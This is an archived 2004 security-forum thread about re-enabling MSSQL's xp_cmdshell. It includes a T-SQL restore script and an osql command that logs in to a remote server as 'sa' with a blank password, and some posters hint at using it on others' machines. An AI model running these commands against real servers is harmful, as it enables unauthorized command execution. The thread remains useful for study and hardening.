hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Sql Question
GovernmentSecurity.org > The Archives > General Network Security
EXPLOiTED
Feb 22 2004, 11:32 PM
sp_dropextendedproc "xp_cmdshell"
i know thats the drop cmd...but how do u re enable it.

locally \ and or remotely
Damned_Vampire
Feb 23 2004, 03:13 AM
CODE

Put the following in a .txt(example: restore.txt) and save it in te same directory as osql.exe is

//////////////////////////////////////////////////////////////////////////////////////////////////////
use master /
exec sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'/
go /
//////////////////////////////////////////////////////////////////////////////////////////////////////

The above path depends on the installation of MSSQL so it can be different under some circumstances.
when done execute osql.exe like this:

osql.exe -S 123.123.123.123 -U sa -P "" -i restore.txt


This is in a text that someone posted in this forum
EXPLOiTED
Feb 23 2004, 08:17 PM
Yea, Great..works......i read that post too..just was confusing with all those posts
sylver
Feb 23 2004, 10:25 PM
but when xp_cmdshell is deleted i cant restore it ?
have tried it some times, but not succeeded blink.gif
Joc00
Feb 23 2004, 11:06 PM
The above works for me aslong as the admin hasnt deleted it himself. Had alot of success with it. Great job to them biggrin.gif
F3X
Feb 24 2004, 08:08 PM
U hack with this methode ?

Bann !!!!

this security not the hackers place
cenobite
Feb 24 2004, 09:00 PM
QUOTE (F3X @ Feb 24 2004, 09:08 PM)
U hack with this methode ?

Bann !!!!

this security not the hackers place

damn dude, haxing a box is THE answer to properly secure one..

EXPLOiTED
Feb 24 2004, 09:04 PM
Hmm....The unsecuring worked great. Then i secured it and tried again later that nght and it didnit work...gave me this error...

C:\>osql.exe -S 192.168.2.100 -U sa -P "" -i restore.txt
1> 2> 3> Msg 2714, Level 16, State 7, Server HEBS, Procedure sp_addextendedproc,
Line 26
[Microsoft][ODBC SQL Server Driver][SQL Server]There is already an object named
'xp_cmdshell' in the database.
1>


Now whats the error?...Also...anyway i can erenable this on the box Locally? i dont wanan reionstall SQL ;(
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.